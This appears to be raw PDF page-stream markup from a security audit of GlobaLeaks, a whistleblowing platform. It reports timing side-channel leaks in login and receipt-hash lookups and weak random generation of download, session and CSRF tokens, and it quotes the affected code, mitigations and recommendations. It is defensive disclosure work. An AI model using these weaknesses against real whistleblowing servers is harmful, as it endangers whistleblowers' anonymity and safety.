Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_count) Tj ( ) Tj .4 .4 .4 rg (+=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg T* ( ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("Receiver login: Invalid password \(failed: ) Tj /F6 10 Tf .733333 .4 .533333 rg (%d) Tj /F3 10 Tf .729412 .129412 .129412 rg (\)") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_count) Tj (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (username) Tj ( ) Tj /F6 10 Tf .666667 .133333 1 rg (in) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_attempts) Tj (:) Tj T* ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_attempts) Tj ([) Tj (username) Tj (]) Tj ( ) Tj .4 .4 .4 rg (+=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (failed_login_attempts) Tj ([) Tj (username) Tj (]) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (False) Tj 0 0 0 rg T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("Receiver: Authorized receiver ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (username) Tj (\)) Tj T* ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (last_login) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (datetime_now) Tj (\(\)) Tj T* ( ) Tj (receiver) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (Receiver) Tj (,) Tj ( ) Tj (\() Tj (Receiver) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (user_id) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj (\)\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (receiver) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 247.0277 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 229.0277 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 199.0277 cm q BT 1 0 0 1 0 14 Tm 2.597126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status:) Tj /F1 10 Tf ( ) Tj 0 0 .501961 rg (Appendix D. Side-Channel Attack Proof of Concept ) Tj 0 0 0 rg (shows that this channel does leak this) Tj T* 0 Tw (information; we have not addressed the feasibility of exploiting it.) Tj T* ET Q Q q 1 0 0 1 62.69291 199.0277 cm Q endstream endobj % 'R373': class PDFStream 373 0 obj % page stream << /Length 3070 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.6: Timing Leak of Receipt Hashes) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Receipt hashes can leak via the timing side-channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to extract the hash of a whistleblower's receipt.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm 1.046457 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker must know the Node's receipt salt and be able to measure the time it) Tj T* 0 Tw (takes the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server to respond to their requests.) Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm q BT 1 0 0 1 0 14 Tm .129986 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The receipt salt is stored in the Node's database on the filesystem. See also ) Tj 0 0 .501961 rg (Issue J: Attacker) Tj T* 0 Tw (May Be Able To Extract Secrets Through Side-Channel Attacks) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 618.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 600.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The hash of the whistleblower's receipt is looked up in the database.) Tj T* ET Q Q q 1 0 0 1 62.69291 539.8298 cm q q .91919 0 0 .91919 0 0 cm q 1 0 0 1 6.6 7.180237 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 510 36 re B* Q q BT 1 0 0 1 0 14 Tm 12 TL /F3 10 Tf 0 0 0 rg (wb_tip) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (WhistleblowerTip) Tj (,) Tj T* ( ) Tj (WhistleblowerTip) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (receipt_hash) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (hashed_receipt) Tj (\)\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 519.8298 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 501.8298 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 483.8298 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) Tj T* ET Q Q q 1 0 0 1 62.69291 483.8298 cm Q endstream endobj % 'R374': class PDFStream 374 0 obj % page stream << /Length 8249 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue K: Secrets Generated with Non-CSPRNG) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q BT 1 0 0 1 0 14 Tm 1.844269 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (When deployed on some systems, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (may generate some of its secrets with an) Tj T* 0 Tw (insecure pseudo-random number generator, ) Tj /F3 10 Tf (PRNG) Tj /F1 10 Tf (, and an attacker might be able to guess them.) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 14 Tm 1.924269 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (Every case where the ) Tj /F3 10 Tf (PRNG ) Tj /F1 10 Tf (output is used, which requires non-predictability, is affected on) Tj T* 0 Tw (vulnerable configurations. 
Here are some ) Tj /F4 10 Tf (non-exhaustive ) Tj /F1 10 Tf (cases which we have not fully verified:) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm Q q 1 0 0 1 62.69291 666.0236 cm Q q 1 0 0 1 62.69291 642.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.80998 Tw (File download tokens may be guessable allowing remote attackers to download Tip submissions) Tj T* 0 Tw (without any user account, nor any explicit download token sharing.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 612.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 3.765366 Tw (Receipts may be compromised, allowing a remote attacker to authenticate as one or more) Tj T* 0 Tw (Whistleblowers.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 606.0236 cm Q q 1 0 0 1 62.69291 582.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 3.571647 Tw (Web session tokens may be compromised, allowing remote attackers to hijack existing web) Tj T* 0 Tw (sessions.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 576.0236 cm Q q 1 0 0 1 62.69291 540.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.459213 Tw 12 TL /F1 10 Tf 0 0 0 rg (Web ) Tj /F3 10 Tf (CSRF ) Tj /F1 10 Tf (protection tokens may be guessed, allowing attackers to compromise victim users by) Tj T* 0 Tw 3.854269 Tw (convincing them to visit malicious web pages on any site with the same browser instance) Tj T* 0 Tw (authenticated to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 540.0236 cm Q q 1 0 0 1 62.69291 510.0236 cm q BT 1 0 0 1 0 14 Tm .19152 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note, this vulnerability is particularly pernicious because the ) Tj /F3 10 Tf (PRNG ) Tj /F1 10 Tf (security depends on specific operating) Tj T* 0 Tw (system configurations, and a fallback to an insecure ) Tj /F3 10 Tf (PRNG ) Tj /F1 10 Tf (is ) Tj /F4 10 Tf (a silent security failure) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 468.0236 cm q BT 1 0 0 1 0 26 Tm .294983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (When a weak pseudo-random number generator is used, the attacker needs to know) Tj T* 0 Tw 1.580574 Tw (the state to predict future and past outputs. They can acquire the state by brute-force guessing or by) Tj T* 0 Tw (reverse-engineering it from known outputs.) Tj T* ET Q Q q 1 0 0 1 62.69291 438.0236 cm q BT 1 0 0 1 0 14 Tm .814431 Tw 12 TL /F1 10 Tf 0 0 0 rg (An example output might be easy to acquire by any remote attacker without any account, such as if the) Tj T* 0 Tw /F3 10 Tf (PRNG ) Tj /F1 10 Tf (output appears as a web session token provided in an ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (response prior to user authentication.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 396.0236 cm q BT 1 0 0 1 0 26 Tm 1.716235 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The attack is only feasible when ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (is deployed in such a way that the random) Tj T* 0 Tw .517674 Tw (number generators are not secure. For example, ) Tj /F4 10 Tf (Linux ) Tj /F1 10 Tf (systems without ) Tj /F3 10 Tf (/dev/urandom ) Tj /F1 10 Tf (and on ) Tj /F4 10 Tf (Solaris) Tj /F1 10 Tf (,) Tj T* 0 Tw (where ) Tj /F3 10 Tf (uuid_generate_random\(\) ) Tj /F1 10 Tf (may not be cryptographically secure.) Tj T* ET Q Q q 1 0 0 1 62.69291 366.0236 cm q BT 1 0 0 1 0 14 Tm .660751 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This vulnerability was verified by inspecting ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (source code, and the source code) Tj T* 0 Tw (of the libraries it uses.) Tj T* ET Q Q q 1 0 0 1 62.69291 348.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 318.0236 cm q BT 1 0 0 1 0 14 Tm 5.080751 Tw 12 TL /F3 10 Tf 0 0 0 rg (uuid4\(\) ) Tj /F1 10 Tf (is used for the file-download token and collection-download token. This is done in) Tj T* 0 Tw /F3 10 Tf (handlers/base.py ) Tj /F1 10 Tf (as follows:) Tj T* ET Q Q q 1 0 0 1 62.69291 176.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 132 re B* Q q BT 1 0 0 1 0 110 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (uuid4) Tj (\(\)\)) Tj T* T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_val) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (id_val) Tj T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (id_type) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('rtip') Tj 0 0 0 rg ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# this is just a debug/informative information) Tj /F3 10 Tf 0 0 0 rg T* T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expireCallbacks) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj ([]) Tj T* T* (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj (]) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj 0 0 0 rg T* T* 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (_expireCall) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (reactor) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (callLater) Tj (\() Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (tokenTimeout) Tj (,) Tj ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (expire) Tj (\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 108.8236 cm q BT 1 0 0 1 0 50 Tm 1.314147 Tw 12 TL /F1 10 Tf 0 0 0 rg (If ) Tj /F3 10 Tf (libuuid ) Tj /F1 10 Tf (or ) Tj /F3 10 Tf (libc ) Tj /F1 10 Tf (are loadable and have a ) Tj /F3 10 Tf (uuid_generate_random\(\) ) Tj /F1 10 Tf (function, then ) Tj /F3 10 Tf (uuid4\(\)) Tj T* 0 Tw .326136 Tw /F1 10 Tf (will use that. Otherwise, it will use ) Tj /F3 10 Tf (os.urandom\(\)) Tj /F1 10 Tf (. On Linux, ) Tj /F3 10 Tf (uuid_generate_random\(\) ) Tj /F1 10 Tf (tries to read) Tj T* 0 Tw .761235 Tw (from ) Tj /F3 10 Tf (/dev/urandom) Tj /F1 10 Tf (, but will fall back to an insecure random number generator if that fails. On Solaris,) Tj T* 0 Tw 1.950814 Tw (the ) Tj /F3 10 Tf (uuid_generate_random\(\) ) Tj /F1 10 Tf (manpage does ) Tj /F4 10 Tf (not ) Tj /F1 10 Tf (explicitly say it attempts to use a cryptographic) Tj T* 0 Tw (random number generator, so it may not be cryptographically secure on Solaris.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 90.82362 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET Q Q endstream endobj % 'R375': class PDFStream 375 0 obj % page stream << /Length 1394 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm q BT 1 0 0 1 0 14 Tm .497318 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators need to make sure ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (is deployed on a) Tj T* 0 Tw (system with a functioning ) Tj /F3 10 Tf (/dev/urandom) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 723.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 693.0236 cm q BT 1 0 0 1 0 14 Tm 4.399147 Tw 12 TL /F1 10 Tf 0 0 0 rg (Generate secrets using a random number generator that's designed for cryptographic use, like) Tj T* 0 Tw /F3 10 Tf (os.urandom\(\)) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 675.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET Q Q q 1 0 0 1 62.69291 669.0236 cm Q q 1 0 0 1 62.69291 669.0236 cm Q q 1 0 0 1 62.69291 657.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #831) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 657.0236 cm Q q 1 0 0 1 62.69291 657.0236 cm Q endstream endobj % 'R376': class PDFStream 376 0 obj % page stream << /Length 8654 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Design and Implementation Analysis) Tj T* ET Q Q q 1 0 0 1 62.69291 705.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 2.441412 Tw (This section includes the results of our analysis which are not security vulnerabilities. 
This includes) Tj T* 0 Tw 1.790888 Tw (commendations for good practices, recommendations for security maintenance, security in depth, and) Tj T* 0 Tw (general engineering principles.) Tj T* ET Q Q q 1 0 0 1 62.69291 678.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Commendations) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm Q q 1 0 0 1 62.69291 474.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 186 cm Q q 1 0 0 1 20 186 cm Q q 1 0 0 1 20 162 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .399983 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (does not let whistleblowers download the files they submit, in line with the ) Tj 0 0 .501961 rg (principle) Tj T* 0 Tw (of least authority) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 162 cm Q q 1 0 0 1 20 156 cm Q q 1 0 0 1 20 144 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q Q Q q 1 0 0 1 20 144 cm Q q 1 0 0 1 20 138 cm Q q 1 0 0 1 20 138 cm Q q 1 0 0 1 20 102 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.815984 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (interface has built-in user education in the form of the Tor banner and the) Tj T* 0 Tw .427045 Tw (terms of service that must be agreed to before submitting a Tip. This is an important and useful) Tj T* 0 Tw (feature, since whistleblowers may not be tech-savvy.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 20 96 cm Q q 1 0 0 1 20 60 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 2.739983 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (uses the Storm ORM for a database instead of having SQL queries, each a) Tj T* 0 Tw .087674 Tw (potential SQL injection vulnerability, spread out over the code. This makes ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (easier to) Tj T* 0 Tw (audit.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 54 cm Q q 1 0 0 1 20 18 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 3.98498 Tw 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (has a well-developed threat model. This made it easier to understand the) Tj T* 0 Tw 3.335433 Tw (environment ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (operates in, and helps users understand the level of protection) Tj T* 0 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (provides.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 12 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Most of the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (code is simple and easy to understand.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 62.69291 474.0236 cm Q q 1 0 0 1 62.69291 447.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Recommendations) Tj T* ET Q Q q 1 0 0 1 62.69291 405.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 2.936647 Tw (In this section we make recommendations on design patterns, coding style, dependency selection,) Tj T* 0 Tw 3.066136 Tw (engineering process, or any other "non-vulnerability" which we believe will improve security of the) Tj T* 0 Tw (software.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 375.0236 cm q BT 1 0 0 1 0 14 Tm 4.32998 Tw 12 TL /F1 10 Tf 0 0 0 rg (Our primary focus for engineering goals are ) Tj /F4 10 Tf (improving maintainability ) Tj /F1 10 Tf (to prevent future security) Tj T* 0 Tw (regressions, and ways to ) Tj /F4 10 Tf (facilitate future audits) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 351.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F5 10 Tf 0 0 0 rg (Coding Practices) Tj T* ET Q Q q 1 0 0 1 62.69291 339.0236 cm Q q 1 0 0 1 62.69291 339.0236 cm Q q 1 0 0 1 62.69291 255.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 74 Tm 1.15284 Tw 12 TL /F4 10 Tf 0 0 0 rg (GLBackend ) Tj /F1 10 Tf (is coded in a combination of ) Tj /F4 10 Tf (Twisted ) Tj /F1 10 Tf (single-thread async style with a separate thread) Tj T* 0 Tw 8.986647 Tw (pool for methods that run transactions on a database. While we examined all) Tj T* 0 Tw .184976 Tw /F3 10 Tf (@transact) Tj /F1 10 Tf (/) Tj /F3 10 Tf (@transact_ro ) Tj /F1 10 Tf (methods without finding a race condition in access to non-transactional) Tj T* 0 Tw .156098 Tw (state, we might easily have missed some, and this style of coding is prone to error: future edits could) Tj T* 0 Tw .909069 Tw (add non-local state update, or more complicated transaction-management of the database, leading) Tj T* 0 Tw .398555 Tw (to a race condition without anyone noticing. We recommend seeking some alternative \(the details of) Tj T* 0 Tw (which are future work in ) Tj 0 0 .501961 rg (Eliminating Threads) Tj 0 0 0 rg (\) running all code on the same event loop.) 
